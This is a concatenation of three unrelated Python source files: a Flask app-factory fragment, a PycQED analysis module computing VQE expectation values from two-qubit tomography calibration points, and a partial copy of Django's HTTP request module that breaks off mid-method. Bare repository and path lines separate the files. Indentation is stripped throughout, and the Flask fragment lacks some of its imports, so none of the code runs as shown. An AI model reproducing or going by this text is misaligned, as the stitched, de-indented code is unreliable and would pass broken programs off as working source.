from flask_mail import Mail
from flask_moment import Moment
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_pagedown import PageDown
from config import config
bootstrap = Bootstrap()
mail = Mail()
moment = Moment()
db = SQLAlchemy()
pagedown = PageDown()
login_manager = LoginManager()
login_manager.session_protection = 'strong'
login_manager.login_view = 'auth.login'
def create_app(config_name):
app = Flask(__name__)
app.config.from_object(config[config_name])
config[config_name].init_app(app)
bootstrap.init_app(app)
mail.init_app(app)
moment.init_app(app)
db.init_app(app)
login_manager.init_app(app)
pagedown.init_app(app)
from .main import main as main_blueprint
app.register_blueprint(main_blueprint)
from .auth import auth as auth_blueprint
app.register_blueprint(auth_blueprint, url_prefix='/auth')
return app
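# Illustrative usage sketch (added for exposition, not part of the original
# module): 'default' is a hypothetical key of the imported config dict; a real
# deployment would typically run the app through a launcher script instead.
#
#     app = create_app('default')
#     app.run(debug=True)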
|
DiCarloLab-Delft/PycQED_py3
|
refs/heads/develop
|
pycqed/analysis_v2/VQE_EVC_2.py
|
1
|
import time
import numpy as np
from pycqed.analysis import analysis_toolbox as a_tools
import pycqed.analysis_v2.base_analysis as ba
# import dataprep for tomography module
# import tomography module
# using the data prep module of analysis V2
# from pycqed.analysis_v2 import tomography_dataprep as dataprep
from pycqed.analysis import measurement_analysis as ma
try:
import qutip as qt
except ImportError as e:
pass
# logging.warning('Could not import qutip, tomo code will not work')
def reshape_block(shots_data, segments_per_block=16, block_size=4092, mode='truncate'):
"""
    inputs: shots_data, a 1D array of length N.
    Organizes the data in blocks of length block_size;
    the number of blocks is N // block_size.
"""
N = len(shots_data)
# Data dimension needs to be an integer multiple of block_size
assert(N%block_size==0)
num_blocks = N//block_size
full_segments = block_size//segments_per_block
orfan_segments = block_size % segments_per_block
missing_segments = segments_per_block - orfan_segments
# print(N,num_blocks,full_segments,orfan_segments,missing_segments)
reshaped_data = shots_data.reshape((num_blocks,block_size))
if mode.lower()=='truncate':
truncate_idx = full_segments*segments_per_block
return reshaped_data[:,:truncate_idx]
elif mode.lower()=='padd':
padd_dim = (full_segments+1)*segments_per_block
return_block = np.nan*np.ones((num_blocks,padd_dim))
return_block[:,:block_size] = reshaped_data
return return_block
else:
raise ValueError('Mode not understood. Needs to be truncate or padd')
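# Illustrative sketch (added for exposition, not part of the original module):
# with block_size=8 and segments_per_block=3, each block of 8 shots holds two
# full segments (6 columns); 'truncate' drops the 2 orphan shots per block.
#
#     >>> data = np.arange(16.)
#     >>> reshape_block(data, segments_per_block=3, block_size=8).shape
#     (2, 6)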
def all_repetitions(shots_data,segments_per_block=16):
flat_dim = shots_data.shape[0]*shots_data.shape[1]
# Data dimension needs to divide the segments_per_block
assert(flat_dim%segments_per_block==0)
num_blocks = flat_dim // segments_per_block
block_data = shots_data.reshape((num_blocks,segments_per_block))
return block_data
def get_segments_average(shots_data, segments_per_block=16, block_size=4092, mode='truncate', average=True):
reshaped_data = reshape_block(shots_data=shots_data,
segments_per_block=segments_per_block,
block_size=block_size,
mode=mode)
all_reps = all_repetitions(shots_data=reshaped_data,
segments_per_block=segments_per_block)
if average:
return np.mean(all_reps,axis=0)
else:
return all_reps
class ExpectationValueCalculation_mmt_computer:
def __init__(self, auto=True, label='', timestamp=None,
fig_format='png',
q0_label='q0',
q1_label='q1', close_fig=True, **kw):
self.label = label
self.timestamp = timestamp
self.fig_format = fig_format
# q0 == D2
self.q0_label = q0_label
# q1 == A
self.q1_label = q1_label
self.n_states = 2 ** 2
self.ma_obj = ma.MeasurementAnalysis(auto=False, label=label,
timestamp=timestamp)
self.ma_obj.get_naming_and_values()
# self.get_naming_and_values()
# hard coded number of segments for a 2 qubit state tomography
# constraint imposed by UHFLI
self.nr_segments = 16
# self.exp_name = os.path.split(self.folder)[-1][7:]
avg_h1 = self.ma_obj.measured_values[0]
avg_h2 = self.ma_obj.measured_values[1]
avg_h12 = self.ma_obj.measured_values[2]
h1_00 = np.mean(avg_h1[36:36+7])
h1_01 = np.mean(avg_h1[43:43+7])
h1_10 = np.mean(avg_h1[50:50+7])
h1_11 = np.mean(avg_h1[57:])
h2_00 = np.mean(avg_h2[36:36+7])
h2_01 = np.mean(avg_h2[43:43+7])
h2_10 = np.mean(avg_h2[50:50+7])
h2_11 = np.mean(avg_h2[57:])
h12_00 = np.mean(avg_h12[36:36+7])
h12_01 = np.mean(avg_h12[43:43+7])
h12_10 = np.mean(avg_h12[50:50+7])
h12_11 = np.mean(avg_h12[57:])
measurement_channel_1 = np.array([avg_h1[0], avg_h1[1], avg_h1[7],
avg_h1[8], avg_h1[14], avg_h1[21],
avg_h1[28], avg_h1[35]])
measurement_channel_2 = np.array([avg_h2[0], avg_h2[1], avg_h2[7], avg_h2[8],
avg_h2[14], avg_h2[21], avg_h2[28], avg_h2[35]])
measurement_channel_3 = np.array([avg_h12[0], avg_h12[1], avg_h12[7],
avg_h12[8], avg_h12[14], avg_h12[21],
avg_h12[28],avg_h12[35]])
self.measurements_tomo = np.array([measurement_channel_1,
measurement_channel_2,
measurement_channel_3]).flatten()
# print(self.measurements_tomo)
# print(len(self.measurements_tomo))
# 108 x 1
# get the calibration points by averaging over the five measurements
# taken knowing the initial state we put in
self.measurements_cal = np.array(
[h1_00, h1_01, h1_10, h1_11,
h2_00, h2_01, h2_10, h2_11,
h12_00, h12_01, h12_10, h12_11])
def _calibrate_betas(self):
"""
calculates betas from calibration points for the initial measurement
operator
Betas are ordered by B0 -> II B1 -> IZ etc(binary counting)
<0|Z|0> = 1, <1|Z|1> = -1
Keyword arguments:
measurements_cal --- array(2 ** n_qubits) should be ordered
correctly (00, 01, 10, 11) for 2 qubits
"""
cal_matrix = np.zeros((self.n_states, self.n_states))
# get the coefficient matrix for the betas
for i in range(self.n_states):
for j in range(self.n_states):
# perform bitwise AND and count the resulting 1s
cal_matrix[i, j] = (-1)**(bin((i & j)).count("1"))
# invert solve the simple system of equations
# print(cal_matrix)
# print(np.linalg.inv(cal_matrix))
betas = np.zeros(12)
# print(self.measurements_cal[0:4])
betas[0:4] = np.dot(np.linalg.inv(cal_matrix),
self.measurements_cal[0:4])
self.betas_up = betas[0:4]
betas[4:8] = np.dot(np.linalg.inv(cal_matrix),
self.measurements_cal[4:8])
self.betas_p = betas[4:8]
betas[8:] = np.dot(np.linalg.inv(cal_matrix),
self.measurements_cal[8:12])
self.betas_pp = betas[8:]
return betas
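    # For reference, the coefficient matrix built in _calibrate_betas above
    # for two qubits (binary counting over II, IZ, ZI, ZZ) is
    #     [[ 1,  1,  1,  1],
    #      [ 1, -1,  1, -1],
    #      [ 1,  1, -1, -1],
    #      [ 1, -1, -1,  1]]
    # so each group of four calibration points is solved against this matrix.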
def assemble_M_matrix_single_block(self, beta_array):
M_matrix_single_block_row_1 = np.array([beta_array[0], beta_array[1],
beta_array[2], beta_array[3],
0, 0, 0, 0, 0, 0])
M_matrix_single_block_row_2 = np.array([beta_array[0],
-1*beta_array[1],
beta_array[2],
-1*beta_array[3],
0, 0, 0, 0, 0, 0])
M_matrix_single_block_row_3 = np.array([beta_array[0],
beta_array[1],
-1*beta_array[2],
-1*beta_array[3],
0, 0, 0, 0, 0, 0])
M_matrix_single_block_row_4 = np.array([beta_array[0],
-1*beta_array[1],
-1*beta_array[2],
beta_array[3],
0, 0, 0, 0, 0, 0])
M_matrix_single_block_row_5 = np.array([beta_array[0],
0, 0, 0, -beta_array[1],
-beta_array[2],
beta_array[3], 0, 0, 0])
M_matrix_single_block_row_6 = np.array([beta_array[0], 0, 0, 0,
beta_array[1],
beta_array[2],
beta_array[3],
0, 0, 0])
M_matrix_single_block_row_7 = np.array([beta_array[0], 0, 0,
0, 0, 0, 0, beta_array[1],
beta_array[2],
beta_array[3]])
M_matrix_single_block_row_8 = np.array([beta_array[0], 0, 0, 0, 0,
0, 0, -beta_array[1],
-beta_array[2],
beta_array[3]])
M_matrix_single_block = np.vstack((M_matrix_single_block_row_1,
M_matrix_single_block_row_2,
M_matrix_single_block_row_3,
M_matrix_single_block_row_4,
M_matrix_single_block_row_5,
M_matrix_single_block_row_6,
M_matrix_single_block_row_7,
M_matrix_single_block_row_8))
M_matrix_single_block = M_matrix_single_block.reshape(8, 10)
return M_matrix_single_block
def assemble_M_matrix(self):
Block1 = self.assemble_M_matrix_single_block(self.betas_up)
Block2 = self.assemble_M_matrix_single_block(self.betas_p)
Block3 = self.assemble_M_matrix_single_block(self.betas_pp)
self.M_matrix = np.vstack((Block1, Block2, Block3)).reshape(24, 10)
return self.M_matrix
def invert_M_matrix(self):
self.inverse_matrix = np.linalg.pinv(self.M_matrix)
return self.inverse_matrix
def execute_error_signalling(self, ev):
II = (ev[0] - ev[3])/(1 - ev[3])
IZ = (ev[1] - ev[2])/(1 - ev[3])
ZI = (ev[1] - ev[2])/(1 - ev[3])
ZZ = (ev[3] - ev[0])/(1 - ev[3])
XX = (ev[4] + ev[5])/(1 - ev[3])
YY = (ev[4] + ev[5])/(1 - ev[3])
ev_error_signalling = np.array([II, IZ, ZI, ZZ, XX, YY])
return ev_error_signalling
def execute_expectation_value_calculation(self):
# assemble matrix that connects RO with terms
self._calibrate_betas()
self.assemble_M_matrix()
self.invert_M_matrix()
# use it to get terms back from RO
rescaled_measurements_tomo = self.measurements_tomo
self.expect_values = np.dot(self.inverse_matrix,
rescaled_measurements_tomo)
expect_values_VQE = np.array([self.expect_values[0],
self.expect_values[1],
self.expect_values[2],
self.expect_values[3],
self.expect_values[6],
self.expect_values[9]])
return expect_values_VQE
def execute_expectation_value_calculation_traceone(self):
# assemble matrix that connects RO with terms
self._calibrate_betas()
self.assemble_M_matrix()
self.inverse_matrix = np.linalg.pinv(self.M_matrix[:, 1:])
# use it to get terms back from RO
rescaled_measurements_tomo = self.measurements_tomo
self.expect_values = np.dot(self.inverse_matrix,
rescaled_measurements_tomo)
expect_values_VQE = np.array([1,
self.expect_values[0],
self.expect_values[1],
self.expect_values[2],
self.expect_values[5],
self.expect_values[8]])
return expect_values_VQE
def execute_expectation_value_calculation_T1signaling(self):
# assemble matrix that connects RO with terms
self._calibrate_betas()
self.assemble_M_matrix()
self.inverse_matrix = np.linalg.pinv(self.M_matrix[:, 1:])
# use it to get terms back from RO
rescaled_measurements_tomo = self.measurements_tomo
self.expect_values = np.dot(self.inverse_matrix,
rescaled_measurements_tomo)
expect_values_VQE = np.array([1,
self.expect_values[0],
self.expect_values[1],
self.expect_values[2],
self.expect_values[5],
self.expect_values[8]])
expect_values_VQE = self.execute_error_signalling(expect_values_VQE)
return expect_values_VQE
class ExpectationValueCalculation:
def __init__(self, auto=True, label='', timestamp=None,
fig_format='png',
q0_label='q0',
q1_label='q1', close_fig=True, **kw):
self.label = label
self.timestamp = timestamp
self.fig_format = fig_format
# q0 == D2
self.q0_label = q0_label
# q1 == A
self.q1_label = q1_label
self.n_states = 2 ** 2
self.ma_obj = ma.MeasurementAnalysis(auto=False, label=label,
timestamp=timestamp)
self.ma_obj.get_naming_and_values()
# self.get_naming_and_values()
# hard coded number of segments for a 2 qubit state tomography
# constraint imposed by UHFLI
# self.nr_segments = 16
# self.exp_name = os.path.split(self.folder)[-1][7:]
avg_h1 = self.ma_obj.measured_values[0]
avg_h2 = self.ma_obj.measured_values[1]
avg_h12 = self.ma_obj.measured_values[2]
        # The calibration-point slices below are hard coded; ideally this
        # should be made selectable with a flag.
h1_00 = np.mean(avg_h1[36:36+7])
h1_01 = np.mean(avg_h1[43:43+7])
h1_10 = np.mean(avg_h1[50:50+7])
h1_11 = np.mean(avg_h1[57:])
h2_00 = np.mean(avg_h2[36:36+7])
h2_01 = np.mean(avg_h2[43:43+7])
h2_10 = np.mean(avg_h2[50:50+7])
h2_11 = np.mean(avg_h2[57:])
h12_00 = np.mean(avg_h12[36:36+7])
h12_01 = np.mean(avg_h12[43:43+7])
h12_10 = np.mean(avg_h12[50:50+7])
h12_11 = np.mean(avg_h12[57:])
mean_h1 = (h1_00+h1_10+h1_01+h1_11)/4
mean_h2 = (h2_00+h2_01+h2_10+h2_11)/4
mean_h12 = (h12_00+h12_11+h12_01+h12_10)/4
#subtract beta 0 from all measurements
#rescale them
avg_h1 -= mean_h1
avg_h2 -= mean_h2
avg_h12 -= mean_h12
scale_h1 = (h1_00+h1_10-h1_01-h1_11)/4
scale_h2 = (h2_00+h2_01-h2_10-h2_11)/4
scale_h12 = (h12_00+h12_11-h12_01-h12_10)/4
avg_h1 = (avg_h1)/scale_h1
avg_h2 = (avg_h2)/scale_h2
avg_h12 = (avg_h12)/scale_h12
#The averages have been redefined so redefine the cal terms
h1_00 = np.mean(avg_h1[36:36+7])
h1_01 = np.mean(avg_h1[43:43+7])
h1_10 = np.mean(avg_h1[50:50+7])
h1_11 = np.mean(avg_h1[57:])
h2_00 = np.mean(avg_h2[36:36+7])
h2_01 = np.mean(avg_h2[43:43+7])
h2_10 = np.mean(avg_h2[50:50+7])
h2_11 = np.mean(avg_h2[57:])
h12_00 = np.mean(avg_h12[36:36+7])
h12_01 = np.mean(avg_h12[43:43+7])
h12_10 = np.mean(avg_h12[50:50+7])
h12_11 = np.mean(avg_h12[57:])
measurement_channel_1 = np.array([avg_h1[0],avg_h1[1],avg_h1[7],avg_h1[8],avg_h1[14],avg_h1[21],avg_h1[28],avg_h1[35]])
measurement_channel_2 = np.array([avg_h2[0],avg_h2[1],avg_h2[7],avg_h2[8],avg_h2[14],avg_h2[21],avg_h2[28],avg_h2[35]])
measurement_channel_3 = np.array([avg_h12[0],avg_h12[1],avg_h12[7],avg_h12[8],avg_h12[14],avg_h12[21],avg_h12[28],avg_h12[35]])
self.measurements_tomo = np.array([measurement_channel_1,measurement_channel_2,measurement_channel_3]).flatten()
# print(self.measurements_tomo)
# print(len(self.measurements_tomo))
# 108 x 1
# get the calibration points by averaging over the five measurements
# taken knowing the initial state we put in
self.measurements_cal=np.array([h1_00, h1_01, h1_10, h1_11, h2_00, h2_01, h2_10, h2_11, h12_00, h12_01, h12_10, h12_11])
def _calibrate_betas(self):
"""
calculates betas from calibration points for the initial measurement
operator
Betas are ordered by B0 -> II B1 -> IZ etc(binary counting)
<0|Z|0> = 1, <1|Z|1> = -1
Keyword arguments:
measurements_cal --- array(2 ** n_qubits) should be ordered
correctly (00, 01, 10, 11) for 2 qubits
"""
cal_matrix = np.zeros((self.n_states, self.n_states))
# get the coefficient matrix for the betas
for i in range(self.n_states):
for j in range(self.n_states):
# perform bitwise AND and count the resulting 1s
cal_matrix[i, j] = (-1)**(bin((i & j)).count("1"))
# invert solve the simple system of equations
# print(cal_matrix)
# print(np.linalg.inv(cal_matrix))
self.betas = np.zeros(12)
# print(self.measurements_cal[0:4])
self.betas[0:4] = np.dot(np.linalg.inv(cal_matrix),
self.measurements_cal[0:4])
self.betas_up = self.betas[0:4]
self.betas[4:8] = np.dot(np.linalg.inv(cal_matrix),
self.measurements_cal[4:8])
self.betas_p = self.betas[4:8]
self.betas[8:] = np.dot(np.linalg.inv(cal_matrix),
self.measurements_cal[8:12])
self.betas_pp = self.betas[8:]
return self.betas
def assemble_M_matrix_single_block(self, beta_array):
M_matrix_single_block_row_1 = np.array([beta_array[1],
beta_array[2], beta_array[3],
0, 0, 0, 0, 0, 0])
M_matrix_single_block_row_2 = np.array([-1*beta_array[1],
beta_array[2],
-1*beta_array[3],
0, 0, 0, 0, 0, 0])
M_matrix_single_block_row_3 = np.array([beta_array[1],
-1*beta_array[2],
-1*beta_array[3],
0, 0, 0, 0, 0, 0])
M_matrix_single_block_row_4 = np.array([-1*beta_array[1],
-1*beta_array[2],
beta_array[3],
0, 0, 0, 0, 0, 0])
M_matrix_single_block_row_5 = np.array([0, 0, 0, -beta_array[1],
-beta_array[2],
beta_array[3], 0, 0, 0])
M_matrix_single_block_row_6 = np.array([0, 0, 0,
beta_array[1],
beta_array[2],
beta_array[3],
0, 0, 0])
M_matrix_single_block_row_7 = np.array([0, 0,
0, 0, 0, 0, beta_array[1],
beta_array[2],
beta_array[3]])
M_matrix_single_block_row_8 = np.array([0, 0, 0, 0,
0, 0, -beta_array[1],
-beta_array[2],
beta_array[3]])
M_matrix_single_block = np.vstack((M_matrix_single_block_row_1,
M_matrix_single_block_row_2,
M_matrix_single_block_row_3,
M_matrix_single_block_row_4,
M_matrix_single_block_row_5,
M_matrix_single_block_row_6,
M_matrix_single_block_row_7,
M_matrix_single_block_row_8))
M_matrix_single_block = M_matrix_single_block.reshape(8, 9)
return M_matrix_single_block
def assemble_M_matrix(self):
Block1 = self.assemble_M_matrix_single_block(self.betas_up)
Block2 = self.assemble_M_matrix_single_block(self.betas_p)
Block3 = self.assemble_M_matrix_single_block(self.betas_pp)
self.M_matrix = np.vstack((Block1, Block2, Block3)).reshape(24, 9)
return self.M_matrix
def invert_M_matrix(self):
self.inverse_matrix = np.linalg.pinv(self.M_matrix)
return self.inverse_matrix
def execute_error_signalling(self, ev):
II = (ev[0] - ev[3])/(1 - ev[3])
IZ = (ev[1] - ev[2])/(1 - ev[3])
ZI = (ev[1] - ev[2])/(1 - ev[3])
ZZ = (ev[3] - ev[0])/(1 - ev[3])
XX = (ev[4] + ev[5])/(1 - ev[3])
YY = (ev[4] + ev[5])/(1 - ev[3])
ev_error_signalling = np.array([II, IZ, ZI, ZZ, XX, YY])
return ev_error_signalling
def execute_expectation_value_calculation_traceone(self):
# assemble matrix that connects RO with terms
self._calibrate_betas()
self.assemble_M_matrix()
self.inverse_matrix = np.linalg.pinv(self.M_matrix)
# use it to get terms back from RO
rescaled_measurements_tomo = self.measurements_tomo
self.expect_values = np.dot(self.inverse_matrix,
rescaled_measurements_tomo)
expect_values_VQE = np.array([1,
self.expect_values[0],
self.expect_values[1],
self.expect_values[2],
self.expect_values[5],
self.expect_values[8]])
return expect_values_VQE
def execute_expectation_value_calculation_T1signaling(self):
# assemble matrix that connects RO with terms
self._calibrate_betas()
self.assemble_M_matrix()
self.inverse_matrix = np.linalg.pinv(self.M_matrix[:, 1:])
# use it to get terms back from RO
rescaled_measurements_tomo = self.measurements_tomo
self.expect_values = np.dot(self.inverse_matrix,
rescaled_measurements_tomo)
expect_values_VQE = np.array([1,
self.expect_values[0],
self.expect_values[1],
self.expect_values[2],
self.expect_values[5],
self.expect_values[8]])
expect_values_VQE = self.execute_error_signalling(expect_values_VQE)
return expect_values_VQE
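# Illustrative usage sketch (label and timestamp are placeholders for a real
# VQE tomography dataset on disk):
#     evc = ExpectationValueCalculation(label='VQE_tomo', timestamp=None)
#     ev = evc.execute_expectation_value_calculation_traceone()
#     # ev is ordered as interpreted by execute_error_signalling:
#     # II, IZ, ZI, ZZ, XX, YY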
|
c0hen/django-venv
|
refs/heads/master
|
lib/python3.4/site-packages/django/http/request.py
|
23
|
from __future__ import unicode_literals
import copy
import re
import sys
from io import BytesIO
from itertools import chain
from django.conf import settings
from django.core import signing
from django.core.exceptions import (
DisallowedHost, ImproperlyConfigured, RequestDataTooBig,
)
from django.core.files import uploadhandler
from django.http.multipartparser import MultiPartParser, MultiPartParserError
from django.utils import six
from django.utils.datastructures import ImmutableList, MultiValueDict
from django.utils.encoding import (
escape_uri_path, force_bytes, force_str, force_text, iri_to_uri,
)
from django.utils.http import is_same_domain, limited_parse_qsl
from django.utils.six.moves.urllib.parse import (
quote, urlencode, urljoin, urlsplit,
)
RAISE_ERROR = object()
host_validation_re = re.compile(r"^([a-z0-9.-]+|\[[a-f0-9]*:[a-f0-9:]+\])(:\d+)?$")
class UnreadablePostError(IOError):
pass
class RawPostDataException(Exception):
"""
You cannot access raw_post_data from a request that has
multipart/* POST data if it has been accessed via POST,
FILES, etc..
"""
pass
class HttpRequest(object):
"""A basic HTTP request."""
# The encoding used in GET/POST dicts. None means use default setting.
_encoding = None
_upload_handlers = []
def __init__(self):
# WARNING: The `WSGIRequest` subclass doesn't call `super`.
# Any variable assignment made here should also happen in
# `WSGIRequest.__init__()`.
self.GET = QueryDict(mutable=True)
self.POST = QueryDict(mutable=True)
self.COOKIES = {}
self.META = {}
self.FILES = MultiValueDict()
self.path = ''
self.path_info = ''
self.method = None
self.resolver_match = None
self._post_parse_error = False
self.content_type = None
self.content_params = None
def __repr__(self):
if self.method is None or not self.get_full_path():
return force_str('<%s>' % self.__class__.__name__)
return force_str(
'<%s: %s %r>' % (self.__class__.__name__, self.method, force_str(self.get_full_path()))
)
def _get_raw_host(self):
"""
Return the HTTP host using the environment or request headers. Skip
allowed hosts protection, so may return an insecure host.
"""
# We try three options, in order of decreasing preference.
if settings.USE_X_FORWARDED_HOST and (
'HTTP_X_FORWARDED_HOST' in self.META):
host = self.META['HTTP_X_FORWARDED_HOST']
elif 'HTTP_HOST' in self.META:
host = self.META['HTTP_HOST']
else:
# Reconstruct the host using the algorithm from PEP 333.
host = self.META['SERVER_NAME']
server_port = self.get_port()
if server_port != ('443' if self.is_secure() else '80'):
host = '%s:%s' % (host, server_port)
return host
def get_host(self):
"""Return the HTTP host using the environment or request headers."""
host = self._get_raw_host()
# Allow variants of localhost if ALLOWED_HOSTS is empty and DEBUG=True.
allowed_hosts = settings.ALLOWED_HOSTS
if settings.DEBUG and not allowed_hosts:
allowed_hosts = ['localhost', '127.0.0.1', '[::1]']
domain, port = split_domain_port(host)
if domain and validate_host(domain, allowed_hosts):
return host
else:
msg = "Invalid HTTP_HOST header: %r." % host
if domain:
msg += " You may need to add %r to ALLOWED_HOSTS." % domain
else:
msg += " The domain name provided is not valid according to RFC 1034/1035."
raise DisallowedHost(msg)
def get_port(self):
"""Return the port number for the request as a string."""
if settings.USE_X_FORWARDED_PORT and 'HTTP_X_FORWARDED_PORT' in self.META:
port = self.META['HTTP_X_FORWARDED_PORT']
else:
port = self.META['SERVER_PORT']
return str(port)
def get_full_path(self, force_append_slash=False):
# RFC 3986 requires query string arguments to be in the ASCII range.
# Rather than crash if this doesn't happen, we encode defensively.
return '%s%s%s' % (
escape_uri_path(self.path),
'/' if force_append_slash and not self.path.endswith('/') else '',
('?' + iri_to_uri(self.META.get('QUERY_STRING', ''))) if self.META.get('QUERY_STRING', '') else ''
)
def get_signed_cookie(self, key, default=RAISE_ERROR, salt='', max_age=None):
"""
Attempts to return a signed cookie. If the signature fails or the
cookie has expired, raises an exception... unless you provide the
default argument in which case that value will be returned instead.
"""
try:
cookie_value = self.COOKIES[key]
except KeyError:
if default is not RAISE_ERROR:
return default
else:
raise
try:
value = signing.get_cookie_signer(salt=key + salt).unsign(
cookie_value, max_age=max_age)
except signing.BadSignature:
if default is not RAISE_ERROR:
return default
else:
raise
return value
def get_raw_uri(self):
"""
Return an absolute URI from variables available in this request. Skip
allowed hosts protection, so may return insecure URI.
"""
return '{scheme}://{host}{path}'.format(
scheme=self.scheme,
host=self._get_raw_host(),
path=self.get_full_path(),
)
def build_absolute_uri(self, location=None):
"""
Builds an absolute URI from the location and the variables available in
this request. If no ``location`` is specified, the absolute URI is
built on ``request.get_full_path()``. Anyway, if the location is
absolute, it is simply converted to an RFC 3987 compliant URI and
returned and if location is relative or is scheme-relative (i.e.,
``//example.com/``), it is urljoined to a base URL constructed from the
request variables.
"""
if location is None:
# Make it an absolute url (but schemeless and domainless) for the
# edge case that the path starts with '//'.
location = '//%s' % self.get_full_path()
bits = urlsplit(location)
if not (bits.scheme and bits.netloc):
current_uri = '{scheme}://{host}{path}'.format(scheme=self.scheme,
host=self.get_host(),
path=self.path)
# Join the constructed URL with the provided location, which will
# allow the provided ``location`` to apply query strings to the
# base path as well as override the host, if it begins with //
location = urljoin(current_uri, location)
return iri_to_uri(location)
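    # Illustrative behaviour, assuming a request for https://example.com/foo/?q=1:
    #     request.build_absolute_uri()         -> 'https://example.com/foo/?q=1'
    #     request.build_absolute_uri('/bar/')  -> 'https://example.com/bar/'
    #     request.build_absolute_uri('baz/')   -> 'https://example.com/foo/baz/'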
def _get_scheme(self):
"""
Hook for subclasses like WSGIRequest to implement. Returns 'http' by
default.
"""
return 'http'
@property
def scheme(self):
if settings.SECURE_PROXY_SSL_HEADER:
try:
header, value = settings.SECURE_PROXY_SSL_HEADER
except ValueError:
raise ImproperlyConfigured(
'The SECURE_PROXY_SSL_HEADER setting must be a tuple containing two values.'
)
if self.META.get(header) == value:
return 'https'
return self._get_scheme()
def is_secure(self):
return self.scheme == 'https'
def is_ajax(self):
return self.META.get('HTTP_X_REQUESTED_WITH') == 'XMLHttpRequest'
@property
def encoding(self):
return self._encoding
@encoding.setter
def encoding(self, val):
"""
Sets the encoding used for GET/POST accesses. If the GET or POST
dictionary has already been created, it is removed and recreated on the
next access (so that it is decoded correctly).
"""
self._encoding = val
if hasattr(self, '_get'):
del self._get
if hasattr(self, '_post'):
del self._post
def _initialize_handlers(self):
self._upload_handlers = [uploadhandler.load_handler(handler, self)
for handler in settings.FILE_UPLOAD_HANDLERS]
@property
def upload_handlers(self):
if not self._upload_handlers:
# If there are no upload handlers defined, initialize them from settings.
self._initialize_handlers()
return self._upload_handlers
@upload_handlers.setter
def upload_handlers(self, upload_handlers):
if hasattr(self, '_files'):
raise AttributeError("You cannot set the upload handlers after the upload has been processed.")
self._upload_handlers = upload_handlers
def parse_file_upload(self, META, post_data):
"""Returns a tuple of (POST QueryDict, FILES MultiValueDict)."""
self.upload_handlers = ImmutableList(
self.upload_handlers,
warning="You cannot alter upload handlers after the upload has been processed."
)
parser = MultiPartParser(META, post_data, self.upload_handlers, self.encoding)
return parser.parse()
@property
def body(self):
if not hasattr(self, '_body'):
if self._read_started:
raise RawPostDataException("You cannot access body after reading from request's data stream")
# Limit the maximum request data size that will be handled in-memory.
if (settings.DATA_UPLOAD_MAX_MEMORY_SIZE is not None and
int(self.META.get('CONTENT_LENGTH') or 0) > settings.DATA_UPLOAD_MAX_MEMORY_SIZE):
raise RequestDataTooBig('Request body exceeded settings.DATA_UPLOAD_MAX_MEMORY_SIZE.')
try:
self._body = self.read()
except IOError as e:
six.reraise(UnreadablePostError, UnreadablePostError(*e.args), sys.exc_info()[2])
self._stream = BytesIO(self._body)
return self._body
def _mark_post_parse_error(self):
self._post = QueryDict()
self._files = MultiValueDict()
self._post_parse_error = True
def _load_post_and_files(self):
"""Populate self._post and self._files if the content-type is a form type"""
if self.method != 'POST':
self._post, self._files = QueryDict(encoding=self._encoding), MultiValueDict()
return
if self._read_started and not hasattr(self, '_body'):
self._mark_post_parse_error()
return
if self.content_type == 'multipart/form-data':
if hasattr(self, '_body'):
# Use already read data
data = BytesIO(self._body)
else:
data = self
try:
self._post, self._files = self.parse_file_upload(self.META, data)
except MultiPartParserError:
# An error occurred while parsing POST data. Since when
# formatting the error the request handler might access
# self.POST, set self._post and self._file to prevent
# attempts to parse POST data again.
# Mark that an error occurred. This allows self.__repr__ to
# be explicit about it instead of simply representing an
# empty POST
self._mark_post_parse_error()
raise
elif self.content_type == 'application/x-www-form-urlencoded':
self._post, self._files = QueryDict(self.body, encoding=self._encoding), MultiValueDict()
else:
self._post, self._files = QueryDict(encoding=self._encoding), MultiValueDict()
def close(self):
if hasattr(self, '_files'):
for f in chain.from_iterable(l[1] for l in self._files.lists()):
f.close()
# File-like and iterator interface.
#
# Expects self._stream to be set to an appropriate source of bytes by
# a corresponding request subclass (e.g. WSGIRequest).
# Also when request data has already been read by request.POST or
# request.body, self._stream points to a BytesIO instance
# containing that data.
def read(self, *args, **kwargs):
self._read_started = True
try:
return self._stream.read(*args, **kwargs)
except IOError as e:
six.reraise(UnreadablePostError, UnreadablePostError(*e.args), sys.exc_info()[2])
def readline(self, *args, **kwargs):
self._read_started = True
try:
return self._stream.readline(*args, **kwargs)
except IOError as e:
six.reraise(UnreadablePostError, UnreadablePostError(*e.args), sys.exc_info()[2])
def xreadlines(self):
while True:
buf = self.readline()
if not buf:
break
yield buf
__iter__ = xreadlines
def readlines(self):
return list(iter(self))
class QueryDict(MultiValueDict):
"""
A specialized MultiValueDict which represents a query string.
A QueryDict can be used to represent GET or POST data. It subclasses
MultiValueDict since keys in such data can be repeated, for instance
in the data from a form with a <select multiple> field.
By default QueryDicts are immutable, though the copy() method
will always return a mutable copy.
Both keys and values set on this class are converted from the given encoding
(DEFAULT_CHARSET by default) to unicode.
"""
# These are both reset in __init__, but is specified here at the class
# level so that unpickling will have valid values
_mutable = True
_encoding = None
def __init__(self, query_string=None, mutable=False, encoding=None):
super(QueryDict, self).__init__()
if not encoding:
encoding = settings.DEFAULT_CHARSET
self.encoding = encoding
query_string = query_string or ''
parse_qsl_kwargs = {
'keep_blank_values': True,
'fields_limit': settings.DATA_UPLOAD_MAX_NUMBER_FIELDS,
'encoding': encoding,
}
if six.PY3:
if isinstance(query_string, bytes):
# query_string normally contains URL-encoded data, a subset of ASCII.
try:
query_string = query_string.decode(encoding)
except UnicodeDecodeError:
# ... but some user agents are misbehaving :-(
query_string = query_string.decode('iso-8859-1')
for key, value in limited_parse_qsl(query_string, **parse_qsl_kwargs):
self.appendlist(key, value)
else:
for key, value in limited_parse_qsl(query_string, **parse_qsl_kwargs):
try:
value = value.decode(encoding)
except UnicodeDecodeError:
value = value.decode('iso-8859-1')
self.appendlist(force_text(key, encoding, errors='replace'),
value)
self._mutable = mutable
@property
def encoding(self):
if self._encoding is None:
self._encoding = settings.DEFAULT_CHARSET
return self._encoding
@encoding.setter
def encoding(self, value):
self._encoding = value
def _assert_mutable(self):
if not self._mutable:
raise AttributeError("This QueryDict instance is immutable")
def __setitem__(self, key, value):
self._assert_mutable()
key = bytes_to_text(key, self.encoding)
value = bytes_to_text(value, self.encoding)
super(QueryDict, self).__setitem__(key, value)
def __delitem__(self, key):
self._assert_mutable()
super(QueryDict, self).__delitem__(key)
def __copy__(self):
result = self.__class__('', mutable=True, encoding=self.encoding)
for key, value in six.iterlists(self):
result.setlist(key, value)
return result
def __deepcopy__(self, memo):
result = self.__class__('', mutable=True, encoding=self.encoding)
